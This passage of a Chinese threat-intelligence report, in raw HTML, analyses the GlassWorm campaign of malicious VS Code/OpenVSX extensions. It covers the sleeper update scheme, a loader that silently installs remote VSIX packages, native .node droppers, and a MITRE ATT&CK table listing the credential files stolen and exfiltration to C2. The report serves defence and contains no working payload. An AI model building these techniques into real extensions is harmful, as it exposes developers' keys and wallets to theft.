163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">二、技术细节分析</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">1. 休眠架构与生命周期管理</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击者利用扩展市场的审核机制盲区，采用典型的 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Sleeper Malware</span></strong><span leaf=""> 架构：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">阶段一（上架期）</span></strong><p><span leaf="">扩展包仅包含基础 UI 组件、静态资源或无害占位逻辑，通过市场自动扫描与人工初筛。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">阶段二（信任期）</span></strong><p><span leaf="">通过克隆流行扩展（如 VS Code 土耳其语语言包）的图标、命名与描述进行视觉欺骗（Typosquatting），配合新注册的 GitHub 账户（仅维护 1-2 个公开仓库作为掩护）积累下载量与用户信任。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">阶段三（激活期）</span></strong><p><span leaf="">通过标准扩展更新通道推送包含恶意加载器的版本，利用开发者&#34;默认信任已安装扩展自动更新&#34;的心理模型完成驻留。</span></p></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2. 动态载荷投递机制（Thin Loader 架构）</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">为规避静态沙箱检测与代码签名验证，加载器采用多模态动态加载技术：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">GitHub 托管 VSIX 注入</span></strong><p><span leaf="">运行时通过 CLI 命令（如 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">code --install-extension &lt;url&gt;</span></code><span leaf="">）静默安装托管于 GitHub 的二级 VSIX 包，实现模块化解耦。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">原生模块滥用（.node）</span></strong><p><span leaf="">捆绑平台特定的编译型 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">.node</span></code><span leaf=""> 文件（据外部情报分析，部分变体使用 Zig 语言编译的 Dropper）。原生模块可绕过 Node.js/JS 沙箱限制，直接调用系统 API 进行文件系统遍历、进程注入与持久化。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">运行时混淆解密</span></strong><p><span leaf="">部分变体依赖重度混淆的 JavaScript，通过字符串变形、控制流平坦化与动态 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">eval()</span></code><span leaf="">/</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">Function</span></code><span leaf=""> 构造器在内存中解密核心逻辑。内置加密或冗余备用 C2 URL，确保单点失效不影响载荷获取。</span></p></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">3. 跨平台与环境适配</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">扩展通过读取 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">process.platform</span></code><span leaf=""> 与 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">process.arch</span></code><span leaf=""> 动态选择对应 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">.node</span></code><span leaf=""> 二进制或混淆脚本，支持 Windows、Linux 与 macOS。macOS 变种还结合了木马化加密货币钱包客户端的辅助投递，形成多路径覆盖。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">三、攻击链还原（MITRE ATT&amp;CK 映射）</span></h2><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);border-collapse: collapse;margin: 1em 8px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><thead><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">攻击阶段</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">ATT&amp;CK 技术编号</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术名称</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">战术实现描述</span></p></th></tr></thead><tbody><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">资源筹备</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">T1583.006</span></code><p><span leaf=""> / </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">T1585.003</span></code></p></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">获取基础设施/开发账户</span></p></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">批量注册 GitHub 账户，伪造元数据，准备 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">.node</span></code><span leaf=""> 编译链与混淆引擎。</span></p></td></tr><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">初始访问</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">T1195.002</span></code></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">供应链攻击：软件供应链</span></p></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">将休眠扩展上传至 OpenVSX Registry，利用官方分发渠道触达目标。</span></p></td></tr><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">执行</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">T1059.006</span></code><p><span leaf=""> / </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">T1106</span></code></p></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">命令行与脚本/原生 API</span></p></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">通过 IDE 扩展宿主进程 (</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">extensionHost</span></code><span leaf="">) 执行 JS 混淆代码或直接调用 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">.node</span></code><span leaf=""> 原生模块。</span></p></td></tr><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">持久化</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">T1547.001</span></code></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">启动项执行</span></p></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用 IDE 扩展机制实现每次编辑器启动时自动加载，无需修改系统注册表或 cron。</span></p></td></tr><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">防御规避</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">T1027</span></code><p><span leaf=""> / </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">T1036.005</span></code><span leaf=""> / </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">T1599</span></code></p></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">混淆/伪装/规避安全控制</span></p></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">首版无恶意特征；运行时解密；克隆合法扩展发布者标识与视觉元素；延迟触发逻辑。</span></p></td></tr><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">凭证收集</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">T1552.001</span></code><p><span leaf=""> / </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">T1552.004</span></code></p></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">凭据发现：本地存储/云凭证</span></p></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">扫描 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">~/.ssh</span></code><span leaf="">, </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">~/.aws/credentials</span></code><span leaf="">, </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">~/.config/Code/User/globalStorage</span></code><span leaf="">, 浏览器钱包目录。</span></p></td></tr><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">数据外传</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">T1041</span></code><p><span leaf=""> / </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">T1567</span></code></p></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">加密通道/收集后外传</span></p></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">通过 HTTPS 将加密后的钱包种子、API Key 传至攻击者控制的 C2 节点（域名/动态 IP 轮换）。</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">四、威胁行为体画像</span></h2><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);border-collapse: collapse;margin: 1em 8px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><thead><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">维度</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">分析结论</span></p></th></tr></thead><tbody><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">身份与组织</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">GlassWorm 并非单一漏洞利用团伙，而是具备 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">工程化流水线能力</span></strong><span leaf=""> 的供应链攻击组织。其战术迭代速度（月度级波浪式攻击）与多生态覆盖（npm, GitHub, VSCode, OpenVSX）表明背后有专职开发、运维与情报团队支撑。</span></p></td></tr><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">核心动机</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">经济利益驱动</span></strong><p><span leaf="">为主。直接目标为加密货币资产窃取与高价值开发者凭证（云 API、Git Token、CI/CD 权限）收割。窃取的凭证极可能用于二次勒索、代码库投毒或黑市交易，具备明显的&#34;财务型 APT&#34;特征。</span></p></td></tr><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">技术能力</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: 